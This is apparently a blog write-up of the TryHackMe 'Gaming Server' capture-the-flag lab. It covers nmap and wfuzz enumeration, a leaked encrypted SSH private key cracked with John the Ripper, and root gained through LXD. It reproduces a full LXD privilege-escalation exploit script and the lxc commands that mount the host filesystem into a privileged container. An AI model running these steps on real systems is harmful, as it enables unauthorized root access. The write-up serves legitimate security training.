sk18um

THM - Gaming Server

March 6, 2022726 words

Gaming Server

skibum 8/30/2020

Enumeration

  1. nmap scan
sudo nmap -sS -sC -O <Machine_IP>                                     
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 21:26 CDT
Nmap scan report for <Machine_IP>
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http
|_http-title: House of danak
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/30%OT=22%CT=1%CU=40971%PV=Y%DS=4%DC=I%G=Y%TM=5F4C601
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M509ST11NW7%O2=M509ST11NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST1
OS:1NW7%O6=M509ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M509NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.31 seconds
  1. There are two ports open one is an http server and the other is ssh. Let's start with the http server.

2.1. Check over http server

wfuzz -w /usr/share/dirb/wordlists/big.txt -u "http://<Machine-IP>/FUZZ" --hc 404 -c
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://<Machine-IP>/FUZZ
Total requests: 20469

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                    
===================================================================

000000015:   403        9 L      28 W     276 Ch      ".htaccess"                                                                
000000016:   403        9 L      28 W     276 Ch      ".htpasswd"                                                                
000015551:   200        3 L      5 W      33 Ch       "robots.txt"                                                               
000016077:   301        9 L      28 W     311 Ch      "secret"                                                                   
000016215:   403        9 L      28 W     276 Ch      "server-status"                                                            
000018777:   301        9 L      28 W     312 Ch      "uploads"                                                                  

Total time: 562.5507
Processed Requests: 20469
Filtered Requests: 20463
Requests/sec.: 36.38605

2.2. look over the robots.txt

user-agent: *
Allow: /
/uploads/

2.3. Now lets check out the http://<Machine-IP>/uploads

  • There is a cracking password dictionary there and a hacker manifesto.

2.4. Now lets check out the secret folder http://<Machine-IP>/seceret

  • There is a secret key in the folder. (RSA Private Key) ```bash -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
/5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY-----

3. When attempting the id_rsa key its askes for a password. (not sure if the usernames are correct.)

4. Crack the ssh password using john the ripper: the password is `letmein`

5. Now `sh john@<Machine-IP> -i secretkey` in to the box, to get the user.txt flag

## Possible Creds

From the pages the names that stand out are "the Mentor" and Beaker from the reverse image search.
- [ ] The Mentor
- [ ] Beaker
- [x] John, from a comment in the html. This is the correct username.

## Priv Esc
1. Run linpeas.sh to see the methods of attack to get higher privilege.
    1. LXD is showing up as a method of attack.
2. Review the method using searchsploit
```bash 
    #!/usr/bin/env bash

    # ----------------------------------
    # Authors: Marcelo Vazquez (S4vitar)
    #          Victor Lasa      (vowkin)
    # ----------------------------------

    # Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
    # Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
    # Step 3: Run this script and you will get root [Victim Machine]
    # Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

    function helpPanel(){
      echo -e "\nUsage:"
      echo -e "\t[-f] Filename (.tar.gz alpine file)"
      echo -e "\t[-h] Show this help panel\n"
      exit 1
    }

    function createContainer(){
      lxc image import $filename --alias alpine && lxd init --auto
      echo -e "[*] Listing images...\n" && lxc image list
      lxc init alpine privesc -c security.privileged=true
      lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
      lxc start privesc
      lxc exec privesc sh
      cleanup
    }

    function cleanup(){
      echo -en "\n[*] Removing container..."
      lxc stop privesc && lxc delete privesc && lxc image delete alpine
      echo " [<E2><88><9A>]"
    }

    set -o nounset
    set -o errexit

    declare -i parameter_enable=0; while getopts ":f:h:" arg; do
      case $arg in
        f) filename=$OPTARG && let parameter_enable+=1;;
        h) helpPanel;;
      esac
    done

    if [ $parameter_enable -ne 1 ]; then
      helpPanel
    else
      createContainer
    fi
  1. Follow the procedure in the method of attack for Ubuntu 18.04
  2. lxc image import ./alpine-v3.12-x86_64-20200905_1639.tar.gz --alias myimage
  3. lxc init myimage ignite -c security.privileged=true
  4. lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
  5. lxc start ignite
  6. lxc exec ignite /bin/sh

P0wn3d!!

  1. Now we have a root shell P0wn3d!! find the flag under /mnt/root/root/root.txt
React to this post
👍❤️🫶👏👌🤯🤔😂😍😭😢😡😮

You'll only receive email when they publish something new.

More from sk18um
All posts